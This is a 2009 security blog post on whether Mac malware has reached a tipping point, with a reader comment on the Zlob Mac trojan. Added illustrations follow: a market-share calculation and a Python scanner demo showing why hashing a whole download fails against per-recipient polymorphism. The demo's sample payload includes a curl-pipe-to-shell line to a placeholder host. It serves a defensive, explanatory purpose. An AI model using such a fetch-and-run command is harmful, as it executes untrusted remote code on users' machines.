
Have we reached the Mac Malware tipping point yet? Eh... maybe?

The technical media is all atwitter over what appears to be the emergence of the first Mac botnet. The infector appears to be an updated version of the trojaned copy of iWork that popped up earlier this year. Anyone who has worked as a Windows virus analyst would scoff at the relative lack of sophistication this malware exhibits, but it is nevertheless a piece of malware, and it is out there. I want to take this opportunity to answer some of the most common questions people have about Mac malware.

Does this mean that Mac users should rush to buy anti-virus software and expect their machines to end up as compromised as a PC? Probably not yet, though that day is coming. This malware spreads only through pirated software, so for now, as long as you aren't downloading pirated software, you are safe from it.

Does this mean Mac malware is going to become endemic? Yes. If no one is running anti-virus software, then nothing cleans up infected systems short of the hardware being replaced at end of life. Given the state of the economy and Mac hardware longevity, that can take a very long time.

Does this mean we have hit the Mac malware tipping point? That I don't know. We can't say that we have reached the Mac malware tipping point unless we come up with a definition for the tipping point itself. Dino Dai Zovi and I have been kicking around a potential "warning sign" that, when seen, indicates we are now in the Mac malware epidemic state. Our current preferred indicator is the emergence of websites that perform drive-by exploits of the browser to install botnet-controllable malware, regardless of whether the exploit is a zero-day or not. In other words, when we see what happens every day on the PC side happen even once on the Mac side, then we all need to run out and buy anti-virus software.

Some time ago you predicted that Mac malware would hit its tipping point at 15% market share. Does this mean you were wrong? Well, my prediction was based on the difficulty of attacking a PC versus the market share of the Mac. I assumed that the difficulty of attacking a PC was defined strictly by the effectiveness of current anti-virus products against a new piece of malware. My back-of-the-envelope estimate put an attacker's success rate at compromising a PC at around 20%, which meant that Macs would have to reach around 16% market share before they attracted the attention of serious malware authors. If the real success rate of an attacker against a PC is lower, then you should expect a Mac malware epidemic far earlier. So the answer is: maybe I'm wrong, but I don't know yet.
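The arithmetic behind that 16% figure, reconstructed here as an added illustration rather than taken from the original post. It assumes that a Mac with no anti-virus installed is compromised essentially every time it is attacked, which the post implies but does not state:

Let $m$ be the Mac market share and $s_{PC} \approx 0.2$ the attacker's success rate against a PC. Per target reached, a campaign aimed at PCs yields $(1-m)\,s_{PC}$ compromises, while one aimed at Macs yields $m \cdot 1$. Macs become the more profitable target when

$$
m > (1-m)\, s_{PC}
\quad\Longrightarrow\quad
m > \frac{s_{PC}}{1 + s_{PC}} = \frac{0.2}{1.2} \approx 0.167 .
$$

The threshold moves with $s_{PC}$: if anti-virus actually holds attackers to $s_{PC} = 0.1$, the break-even share drops to $0.1/1.1 \approx 9\%$, which is the sense in which a lower PC success rate pulls the tipping point earlier.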

In short, contrary to popular opinion, the story for Mac malware hasn't changed this week. However, as both users and information security professionals, we need to remain vigilant, watch for the tipping point in Mac malware, and use that as the trigger to install Mac AV software.

Comments (1)

"In other words, when we see what happens every day on the PC side happen once on the Mac side, then we all need to run out and buy anti-virus software."

Websites pushing a Mac port of the Zlob trojan are over a year old... It's not a botnet per se (it's a downloader, but as Conficker shows, downloaders can also be botnets if the target payload is just right), and it's not a drive-by download (rather, it's the fake codec ruse), but it is something that we see happen on the PC side every day (the Zlob gang were pros, and reasonably successful ones at that)... The Mac version even had rudimentary server-side polymorphism, as the DMG file had a different hash depending on the IP address of the recipient (so scanners that couldn't look at the contents of the DMG envelope would be SOL)...
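The commenter's last point, that a per-recipient DMG hash defeats any scanner that only hashes the downloaded file, is worth seeing in code. The following is an added example, not code from the post, the comment, or any real scanner. A zip archive stands in for the DMG image, the installer payload and recipient IPs are constructed sample data, and the per-download variation is placed in the archive comment to mimic a server stamping each download with the downloader's address.

```python
# Added illustration (not from the original post or comment): why hashing the
# download "envelope" is useless against per-recipient polymorphism, and why a
# scanner has to look at the contents instead. A zip archive stands in for the
# DMG image; the payload file and recipient IPs are constructed sample data.
import hashlib
import io
import zipfile

# Constructed stand-in for the malicious installer inside the image.
PAYLOAD_NAME = "Install.pkg"
PAYLOAD_BYTES = b"#!/bin/sh\n# pretend installer\ncurl http://example.invalid/update | sh\n"


def build_image(recipient_ip: str) -> bytes:
    """Build a container whose bytes vary per recipient but whose payload does not.

    The per-recipient variation goes in the archive comment, mimicking a server
    that stamps each download with the downloader's IP address.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(PAYLOAD_NAME, PAYLOAD_BYTES)
        zf.comment = f"served-to:{recipient_ip}".encode()
    return buf.getvalue()


def envelope_hash(image: bytes) -> str:
    """What a naive scanner checks: the hash of the whole download."""
    return hashlib.sha256(image).hexdigest()


def payload_hashes(image: bytes) -> dict[str, str]:
    """What a content-aware scanner checks: a hash of each file inside."""
    with zipfile.ZipFile(io.BytesIO(image)) as zf:
        return {name: hashlib.sha256(zf.read(name)).hexdigest()
                for name in zf.namelist()}


def matches_known_bad(image: bytes, bad_payload_hashes: set[str]) -> bool:
    """Detect by payload hash, however the outer container was mutated."""
    return any(h in bad_payload_hashes for h in payload_hashes(image).values())


if __name__ == "__main__":
    # Two downloads of the "same" image served to two different addresses.
    images = {ip: build_image(ip) for ip in ("198.51.100.7", "203.0.113.42")}
    for ip, img in images.items():
        print(ip, "envelope", envelope_hash(img)[:16],
              "payload", payload_hashes(img)[PAYLOAD_NAME][:16])
```

Run stand-alone, the two downloads show different envelope hashes and identical payload hashes: a blocklist keyed on the whole file never matches twice, while one keyed on the extracted installer catches every copy. The same logic applies to real DMG images once a scanner can mount or parse them.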



This page contains a single entry from the blog posted on April 19, 2009 7:18 PM.
